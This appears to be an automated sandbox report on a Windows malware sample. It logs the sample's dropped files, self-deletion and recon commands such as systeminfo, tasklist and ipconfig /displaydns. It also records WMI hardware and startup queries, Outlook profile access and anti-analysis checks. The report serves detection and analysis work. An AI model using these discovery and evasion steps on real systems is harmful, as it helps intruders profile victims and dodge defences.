                Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: aepic.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: powrprof.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dxgi.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wtsapi32.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.appcore.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: umpdc.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winhttp.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
                Source: C:\Windows\explorer.exe | Section loaded: aepic.dll
                Source: C:\Windows\explorer.exe | Section loaded: twinapi.dll
                Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
                Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
                Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\explorer.exe | Section loaded: dxgi.dll
                Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exe | Section loaded: propsys.dll
                Source: C:\Windows\explorer.exe | Section loaded: coremessaging.dll
                Source: C:\Windows\explorer.exe | Section loaded: urlmon.dll
                Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\explorer.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exe | Section loaded: wtsapi32.dll
                Source: C:\Windows\explorer.exe | Section loaded: wininet.dll
                Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
                Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
                Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\explorer.exe | Section loaded: twinapi.appcore.dll
                Source: C:\Windows\explorer.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\explorer.exe | Section loaded: wldp.dll
                Source: C:\Windows\explorer.exe | Section loaded: iertutil.dll
                Source: C:\Windows\explorer.exe | Section loaded: srvcli.dll
                Source: C:\Windows\explorer.exe | Section loaded: netutils.dll
                Source: C:\Windows\explorer.exe | Section loaded: umpdc.dll
                Source: C:\Windows\explorer.exe | Section loaded: dnsapi.dll
                Source: C:\Windows\explorer.exe | Section loaded: winhttp.dll
                Source: C:\Windows\System32\ipconfig.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\ipconfig.exe | Section loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\ipconfig.exe | Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\ipconfig.exe | Section loaded: dnsapi.dll
                Source: C:\Windows\System32\ROUTE.EXE | Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\ROUTE.EXE | Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\ROUTE.EXE | Section loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\ROUTE.EXE | Section loaded: dnsapi.dll
                Source: C:\Windows\System32\netsh.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\netsh.exe | Section loaded: ifmon.dll
                Source: C:\Windows\System32\netsh.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\netsh.exe | Section loaded: mprapi.dll
                Source: C:\Windows\System32\netsh.exe | Section loaded: rasmontr.dll
                Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
                Source: C:\Windows\SysWOW64\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                Source: KTh1gQlT9a.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                Data Obfuscation

                Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Unpacked PE file: 0.2.KTh1gQlT9a.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\esjbbri | Unpacked PE file: 4.2.esjbbri.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Local\Temp\E647.exe | Unpacked PE file: 6.2.E647.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\uejbbri | Unpacked PE file: 7.2.uejbbri.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Local\Temp\B575.exe | Code function: 8_2_00007FF7CB8778EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process, 8_2_00007FF7CB8778EC
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Code function: 0_2_004014D9 pushad ; ret 0_2_004014E9
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Code function: 0_2_004031DB push eax; ret 0_2_004032AB
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Code function: 0_2_02601540 pushad ; ret 0_2_02601550
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Code function: 0_2_0265D85C push eax; retf 0_2_0265D85D
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Code function: 0_2_02672227 pushfd ; iretd 0_2_02672228
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Code function: 0_2_0267172A push B63524ADh; retn 001Fh 0_2_02671761
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Code function: 0_2_02673387 push esp; ret 0_2_02673389
                Source: C:\Users\user\AppData\Roaming\esjbbri | Code function: 4_2_004014D9 pushad ; ret 4_2_004014E9
                Source: C:\Users\user\AppData\Roaming\esjbbri | Code function: 4_2_004031DB push eax; ret 4_2_004032AB
                Source: C:\Users\user\AppData\Roaming\esjbbri | Code function: 4_2_02521540 pushad ; ret 4_2_02521550
                Source: C:\Users\user\AppData\Roaming\esjbbri | Code function: 4_2_026E1B2F pushfd ; iretd 4_2_026E1B30
                Source: C:\Users\user\AppData\Roaming\esjbbri | Code function: 4_2_026E1032 push B63524ADh; retn 001Fh 4_2_026E1069
                Source: C:\Users\user\AppData\Roaming\esjbbri | Code function: 4_2_026E2C8F push esp; ret 4_2_026E2C91
                Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_0040100B push esi; ret 6_2_0040100C
                Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_0040280E push esp; ret 6_2_004029C6
                Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_0040281F push esp; ret 6_2_004029C6
                Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_00402822 push esp; ret 6_2_004029C6
                Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_00401328 push edi; retf 6_2_0040132A
                Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_004027ED push esp; ret 6_2_004029C6
                Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_004027FB push esp; ret 6_2_004029C6
                Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_024E2854 push esp; ret 6_2_024E2A2D
                Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_024E2862 push esp; ret 6_2_024E2A2D
                Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_024E2875 push esp; ret 6_2_024E2A2D
                Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_024E1072 push esi; ret 6_2_024E1073
                Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_024E1909 push esp; iretd 6_2_024E19BF
                Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_024E2889 push esp; ret 6_2_024E2A2D
                Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_024E1386 push edi; retf 6_2_024E1391
                Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_024E2886 push esp; ret 6_2_024E2A2D
                Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_02681A39 push 9A832F1Fh; iretd 6_2_02681A3F
                Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_026802CB push edi; retf 6_2_026802CC
                Source: C:\Users\user\AppData\Local\Temp\E647.exe | Code function: 6_2_0267FFB4 push esi; ret 6_2_0267FFB5

                Persistence and Installation Behavior

                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\E647.exe
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\esjbbri
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\uejbbri
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\B575.exe

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\kth1gqlt9a.exe
                Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\esjbbri:Zone.Identifier read attributes | delete
                Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\uejbbri:Zone.Identifier read attributes | delete
                Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B575.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\esjbbri | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\esjbbri | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\esjbbri | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\esjbbri | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\esjbbri | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\esjbbri | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\E647.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\E647.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\E647.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\E647.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\E647.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\E647.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\uejbbri | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\uejbbri | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\uejbbri | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\uejbbri | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\uejbbri | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\uejbbri | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Windows\SysWOW64\explorer.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep graph_12-884
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity WHERE ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}"
Source: C:\Users\user\AppData\Local\Temp\B575.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity WHERE ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}"
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, PNPDeviceID, Manufacturer, Description FROM Win32_PnPEntity WHERE ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}"
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
Source: C:\Users\user\AppData\Local\Temp\B575.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, ProductName, ServiceName, NetConnectionID FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_StartupCommand
Source: C:\Users\user\AppData\Local\Temp\B575.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_StartupCommand
Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Location, Command FROM Win32_StartupCommand
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | API/Special instruction interceptor: Address: 7FF8C88ED584
Source: C:\Users\user\AppData\Roaming\esjbbri | API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\AppData\Roaming\esjbbri | API/Special instruction interceptor: Address: 7FF8C88ED584
Source: C:\Users\user\AppData\Local\Temp\E647.exe | API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\AppData\Local\Temp\E647.exe | API/Special instruction interceptor: Address: 7FF8C88ED584
Source: C:\Users\user\AppData\Roaming\uejbbri | API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\AppData\Roaming\uejbbri | API/Special instruction interceptor: Address: 7FF8C88ED584
Source: esjbbri, 00000004.00000002.2365317103.00000000026BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ASWHOOK
